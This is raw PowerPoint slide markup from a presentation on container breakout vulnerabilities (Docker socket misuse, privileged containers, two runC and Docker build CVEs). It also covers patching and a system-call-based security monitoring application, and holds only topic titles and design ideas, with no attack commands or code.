            <a:ext cx="10706100" cy="819150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2064130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a:xfrm>
            <a:off x="838200" y="197037"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Outline</a:t>
            </a:r>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838200" y="1248352"/>
            <a:ext cx="10515600" cy="4855602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Breakout</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Examples: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container attack using privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>CVE-2019-13139 - Docker build code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2024-21626 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Escape Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Patching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="90000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container attack using privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>CVE-2019-13139 - Docker build code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2024-21626 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Escape Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Security Monitoring Application: Key Ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Security Monitoring Application: Architecture Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Examples of Analyzing Breakout Vulnerabilities</a:t>
            </a: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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1082304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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>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p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Aptos"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security Monitoring Application: Key Ideas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Aptos"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security Monitoring Application: Architecture Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Aptos"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Examples of Analyzing Breakout Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3857140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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>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a:xfrm>
            <a:off x="952500" y="2074574"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Security Monitoring Application: Key Ideas </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Aptos"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Security Monitoring Application: Architecture Overview </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Examples of Analyzing Breakout Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRP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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142099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24E-250F-50A1-F1B7-994F344B901B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Security Monitoring Application: Key Ideas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{120F2037-A10C-54A7-CD64-9C6429C08E8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Signature-based</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Calibri" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Since we are tackling specific container breakout vulnerabilities, this gives us accuracy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Observe system call sequences</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" b="1">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Calibri" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>System calls provide full visibility over any change of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>syste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Dynamic sequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Calibri" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fixed sequences provide less adaptability, instead, signatures that can model a specific behavior is much better in detecting wider ranges of exploit categories</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Manual signature generation</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" b="1">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Calibri" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A human-in-the-loop approach to justify and generate appropriate signatures</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBE134B-ADA8-A772-B9DA-AF07174E89F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4AFDA05-E170-C589-B325-C1F1D0F4A083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3005075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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>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p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Aptos"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security Monitoring Application: Key Ideas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Aptos"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security Monitoring Application: Architecture Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Aptos"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Examples of Analyzing Breakout Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2333603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D1DA-7349-3F45-BD0D-D8DA480C71F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1130300" y="376910"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security Monitoring Application: Architecture Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64C3A2DF-DC2A-EEFA-BD00-D6D90CE6D9D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E72BC3E7-06FB-11A1-AFEE-3A28A1EE3470}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{401172D4-01CA-F993-14BB-99D7A3DC0ED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1872343" y="1471303"/>
            <a:ext cx="8447315" cy="4568537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
